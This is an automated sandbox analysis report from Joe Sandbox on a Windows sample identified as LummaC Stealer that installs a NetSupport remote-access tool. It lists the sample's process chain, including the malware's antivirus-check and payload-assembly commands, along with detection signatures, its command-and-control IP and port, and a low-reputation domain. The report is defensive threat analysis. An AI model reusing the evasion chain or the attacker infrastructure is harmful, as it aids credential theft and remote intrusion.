Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0ud2VlMOvF.exe

Overview

General Information

Sample Name:0ud2VlMOvF.exe
Original Sample Name:2db4e85f42ab1b1b22a6829f273566a7.bin.exe
Analysis ID:831174
MD5:2db4e85f42ab1b1b22a6829f273566a7
SHA1:9883c2037aba20b5a962a121030360e989261bde
SHA256:1b23f6605bf3ee638b369bc344cbd02591b5a9ab320a874b07088652b8d93888
Tags:binexe
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected LummaC Stealer
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Uses known network protocols on non-standard ports
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Drops PE files with a suspicious file extension
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Obfuscated command line found
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Enables security privileges
Found evaded block containing many API calls

Classification

Process Tree

  • System is w10x64
  • 0ud2VlMOvF.exe (PID: 4620 cmdline: C:\Users\user\Desktop\0ud2VlMOvF.exe MD5: 2DB4E85F42AB1B1B22A6829F273566A7)
    • client32.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe" MD5: 2286E6E9C894051C0E4A856B42AD7DCD)
    • rrrr.exe (PID: 5080 cmdline: "C:\Users\user\AppData\Local\Temp\rrrr.exe" MD5: 0AC85848A3421C877A87DCD5CD1A2A8E)
      • Engine.exe (PID: 6112 cmdline: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe /TH_ID=_2692 /OriginExe="C:\Users\user\AppData\Local\Temp\rrrr.exe" MD5: 8F234EB6FAF146795C790D8191A0DC1F)
        • cmd.exe (PID: 3156 cmdline: C:\Windows\system32\CmD.exe /c cmd < Highlights MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3508 cmdline: cmd MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • powershell.exe (PID: 1868 cmdline: powershell get-process avastui MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • powershell.exe (PID: 4980 cmdline: powershell get-process avgui MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • findstr.exe (PID: 2788 cmdline: findstr /V /R "^cruzVehicleRespectiveDiane$" Players MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
            • Close.exe.pif (PID: 4916 cmdline: 4744\\Close.exe.pif 4744\\m MD5: 0162A97ED477353BC35776A7ADDFFD5C)
              • Close.exe.pif (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif MD5: 0162A97ED477353BC35776A7ADDFFD5C)
            • PING.EXE (PID: 6084 cmdline: ping localhost -n 8 MD5: 70C24A306F768936563ABDADB9CA9108)
  • client32.exe (PID: 2400 cmdline: "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe" MD5: 2286E6E9C894051C0E4A856B42AD7DCD)
  • client32.exe (PID: 836 cmdline: "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe" MD5: 2286E6E9C894051C0E4A856B42AD7DCD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000013.00000003.742951268.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              00000003.00000002.368688274.0000000000E32000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000003.00000000.367232590.0000000000E32000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000013.00000003.714649771.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                      Click to see the 33 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      1.2.client32.exe.e30000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        3.2.client32.exe.6d080000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          2.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                            2.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              1.2.client32.exe.6d090000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 23 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                Timestamp:192.168.2.4109.107.178.1064969725522827745 03/21/23-08:03:11.906603
                                SID:2827745
                                Source Port:49697
                                Destination Port:2552
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for submitted file
                                Source: 0ud2VlMOvF.exeVirustotal: Detection: 10%Perma Link
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeReversingLabs: Detection: 23%
                                Source: 10.0.Engine.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen

                                Compliance

                                barindex
                                Detected unpacking (creates a PE file in dynamic memory)
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeUnpacked PE file: 0.2.0ud2VlMOvF.exe.950000.1.unpack
                                Source: 0ud2VlMOvF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeFile opened: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 198.54.121.245:443 -> 192.168.2.4:49695 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeFile created: C:\Users\user\AppData\Local\Temp\SETUP_44067\Setup.txtJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000001.00000002.828774382.000000006CFC1000.00000020.00000001.01000000.00000009.sdmp, client32.exe, 00000002.00000002.350769337.000000006CFC1000.00000020.00000001.01000000.00000009.sdmp, client32.exe, 00000003.00000002.369216420.000000006CFC1000.00000020.00000001.01000000.00000009.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: \Stub.pdb source: 0ud2VlMOvF.exe, 00000000.00000002.627468833.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: psapi.pdb source: rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: C:\CruiseControl\projects\Shared-5.0.0\compilation_unit\x86\canetvwr\canvGUI\win32rel\canetworkvwr.pdb source: 0ud2VlMOvF.exe, 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmp, 0ud2VlMOvF.exe, 00000000.00000000.303146283.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: C:\Users\Admin\Desktop\Dropper\NetDropper\Release\Stub.pdb source: 0ud2VlMOvF.exe, 0ud2VlMOvF.exe, 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, 0ud2VlMOvF.exe, 00000000.00000003.307831849.0000000000910000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: gacutil.pdb source: rrrr.exe, 00000009.00000003.631554051.00000000022E2000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: C:\Users\Admin\Desktop\Dropper\NetDropper\Release\Stub.pdb@ source: 0ud2VlMOvF.exe, 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, 0ud2VlMOvF.exe, 00000000.00000003.307831849.0000000000910000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: gacutil.pdb\i386\bbt\gacutil.pdbHo# source: rrrr.exe, 00000009.00000003.631554051.00000000022E2000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000001.00000002.828933690.000000006D082000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000002.00000002.350926851.000000006D082000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000003.00000002.369369954.000000006D082000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000001.00000002.828987104.000000006D095000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000002.00000002.350955036.000000006D095000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000003.00000002.369407860.000000006D095000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1250\1250\client32\release_unicode\client32.pdb source: client32.exe, 00000001.00000002.827413930.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000001.00000000.319169996.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000002.00000002.350058442.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000002.00000000.347982915.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000003.00000002.368688274.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000003.00000000.367232590.0000000000E32000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: \i386\bbt\gacutil.pdb source: rrrr.exe, 00000009.00000003.631554051.00000000022E2000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: \Stub.pdb@ source: 0ud2VlMOvF.exe, 00000000.00000002.627468833.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Temp\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00977032 FindFirstFileExW,FindNextFileW,FindClose,0_2_00977032
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00976F7E _free,_free,FindFirstFileExW,0_2_00976F7E

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2827745 ETPRO TROJAN NetSupport RAT CnC Activity 192.168.2.4:49697 -> 109.107.178.106:2552
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 2552 -> 49697
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 2552 -> 49697
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Performs DNS queries to domains with low reputation
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeDNS query: mediainfotv.xyz
                                Uses ping.exe to check the status of other devices and networks
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 8
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                                Source: Joe Sandbox ViewASN Name: TELEPORT-TV-ASRU TELEPORT-TV-ASRU
                                Source: Joe Sandbox ViewIP Address: 51.142.119.24 51.142.119.24
                                Source: global trafficTCP traffic: 192.168.2.4:49697 -> 109.107.178.106:2552
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639468527.0000000002A43000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639481606.0000000002A43000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631656746.00000000022EC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteCodeSigningCA.crl0
                                Source: rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631656746.00000000022EC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
                                Source: client32.exe, 00000001.00000003.322465247.0000000005128000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000001.00000003.322259578.0000000005125000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322246564.0000000005121000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322465247.0000000005128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp)
                                Source: client32.exe, 00000001.00000003.326358193.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323361228.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327217206.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.384862941.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327017392.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000002.827940603.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.325965285.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328706032.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp-
                                Source: client32.exe, 00000001.00000003.328602468.0000000005186000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328401582.0000000005162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328996167.0000000005190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLMEM
                                Source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000001.00000003.326358193.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323361228.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327217206.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.384862941.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327017392.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000002.827940603.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.325965285.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328706032.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspa
                                Source: client32.exe, 00000001.00000003.321893899.0000000005140000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326847295.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326818541.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322613100.000000000519E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.324728406.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327481078.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323631873.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327784492.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326508942.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323217863.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322135117.000000000518E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327309274.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.321961161.0000000005142000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.324561077.000000000519E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspo
